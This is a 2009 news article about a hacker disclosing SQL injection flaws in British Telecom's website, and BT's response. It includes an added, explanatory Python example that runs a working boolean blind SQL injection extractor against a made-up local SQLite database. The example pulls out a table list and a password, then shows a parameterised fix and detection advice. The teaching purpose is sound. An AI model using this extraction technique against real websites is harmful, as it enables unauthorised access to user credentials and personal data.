Hacker disagrees and publishes more information

Mar 12, 2009 08:14 GMT  ·  By

Following the disclosure of an SQL injection vulnerability affecting a section of the British Telecom website, the company claims that no customer data has been affected. Meanwhile, the hacker has published evidence of a new, more serious flaw on BT.com.

The original security breach was reported by a Romanian hacker calling himself "unu" in a post on the website of the self-proclaimed ethical hacking outfit HackersBlog. In an e-mail to Softpedia, a BT spokesperson claims that the security breach has only affected a test system. "BT has carried out a thorough investigation of this alleged breach. We have found that access was gained to a test database and therefore no customer details were revealed at any time," he writes.

"When sites are under test, they do not contain live data and are often not included within our secure network until they become operational. BT has developed rigorous, world-leading protection against unauthorised computer access in order to protect customer details and commercial interests. Where a suspected intrusion has occurred, BT will act swiftly to ensure our customer data is not at risk. Our operational systems have not been affected in any way by this attempt to break through our security," the rest of the e-mail reads.

The same statement was apparently also given to The Register. However, Rik Ferguson, solutions architect at antivirus vendor Trend Micro, commented that "I certainly don’t have any visibility of which systems or databases were compromised, but I can confirm, through my own research, that the information made visible through the compromise is real, valid and belongs to individuals not directly employed by British Telecom."

Meanwhile, the hacker has made good on his original promise and published more information on the security breach as an "episode 2." The new post discloses another SQL injection vulnerability, more specifically a blind SQL injection ("blind SQLi"), in http://www.comparebroadband.bt.com/compare.asp. Notably, the Internet Archive stores versions of this page dating back as far as November 2006, which is hard to square with the "test server" explanation.

Furthermore, "unu" explains that "We kept on hold the publication of the vulnerable parameter, which would allow full access in ALL the databases of the main server, waiting for the issue to be solved." To back up this claim, the hacker includes a listing of the 37 databases. "First, database 'BT' is the most interesting one. Nonetheless, the others also yield a wealth of important data about the users: personal data, passwords, etc." he notes.
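The "blind" qualifier above matters: the page never shows the attacker any query output, only whether or not it rendered results, yet that single bit per request is enough to pull whole strings out of any database the connection can reach. The following Python is an added illustration and is not code from the article, from HackersBlog or from BT. Everything in it is constructed: the in-memory SQLite schema, the table and column names, the hypothetical `vulnerable_compare` handler (modelled on a compare page that concatenates a query-string value into SQL) and the sample data. Nothing is known about BT's actual code. The example extracts the table list and a stored password through a boolean oracle, counts how many requests that costs, and shows the same payload failing against a parameterised handler.

```python
import sqlite3


# Constructed stand-in for a backend database; table and column names are
# invented for this illustration and say nothing about BT's real schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tariffs (id INTEGER, name TEXT, speed_mb INTEGER)")
    conn.executemany("INSERT INTO tariffs VALUES (?, ?, ?)",
                     [(1, "Option 1", 8), (2, "Option 2", 8), (3, "Option 3", 24)])
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice@example.net', 's3cret')")
    return conn


def vulnerable_compare(conn, speed):
    """Hypothetical handler: the query-string value is concatenated straight
    into the SQL. Errors render as an empty page, so the attacker never sees
    data directly (hence 'blind'), only whether rows were listed."""
    sql = "SELECT name FROM tariffs WHERE speed_mb = " + speed
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return []


def safe_compare(conn, speed):
    """Hardened form: validate the type, then bind the value as a parameter
    so it can never become part of the SQL text."""
    try:
        speed_int = int(speed)
    except ValueError:
        return []
    rows = conn.execute("SELECT name FROM tariffs WHERE speed_mb = ?", (speed_int,))
    return [row[0] for row in rows]


class BlindExtractor:
    """Boolean-based blind extraction: each request asks one yes/no question
    about one character, answered only as 'rows shown' vs 'nothing shown'."""

    def __init__(self, conn, handler):
        self.conn = conn
        self.handler = handler
        self.requests = 0

    def ask(self, condition):
        # A legitimate value (8) keeps the page populated; the appended
        # condition decides whether those rows survive the WHERE clause.
        self.requests += 1
        return len(self.handler(self.conn, "8 AND (" + condition + ")")) > 0

    def extract(self, subquery, max_len=64):
        # Binary-search each character's code point over 0..127, which is
        # exactly 7 requests per position. substr() past the end yields ''
        # and unicode('') is NULL, so every comparison fails and the search
        # settles on 0: end of string.
        out = ""
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self.ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            if lo == 0:
                break
            out += chr(lo)
        return out


def demo():
    conn = build_db()
    attacker = BlindExtractor(conn, vulnerable_compare)
    # Enumerate the schema first (the SQLite analogue of listing databases),
    # then pull a credential out of a table the page never queries itself.
    tables = attacker.extract("SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    pwd = attacker.extract("SELECT pwd FROM users WHERE id = 1")
    # Same payloads against the hardened handler: int() rejects them, so
    # there is no oracle and nothing comes back.
    blocked = BlindExtractor(conn, safe_compare).extract("SELECT pwd FROM users WHERE id = 1")
    return tables, pwd, attacker.requests, blocked


if __name__ == "__main__":
    print(demo())
```

Two points worth noting from running it: the 6-character password costs 49 requests and the 13-character table list 98, which is why blind injection against a real site shows up in access logs as long bursts of near-identical requests differing only in a numeric comparison, a pattern worth alerting on; and the fix is not filtering characters but refusing to let untrusted input become SQL text at all, which is what the parameter binding in `safe_compare` does.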

It is stressed in the new HackersBlog article that "This blind SQL Injection grants us way more access to larger parts of the databases than the one used to find the previous vulnerability in BT.com." Even so, the whitehat hacking group expresses its appreciation for the professionalism and manners displayed by BT in handling this incident, and "unu" advises caution.

"Don't rush to conclusions and start pointing fingers before you see the next articles where we will show similar issues with other large telecommunication providers. As we said earlier, we don't take sides, but rather want to show that the above mentioned vulns can be found almost everywhere," he writes.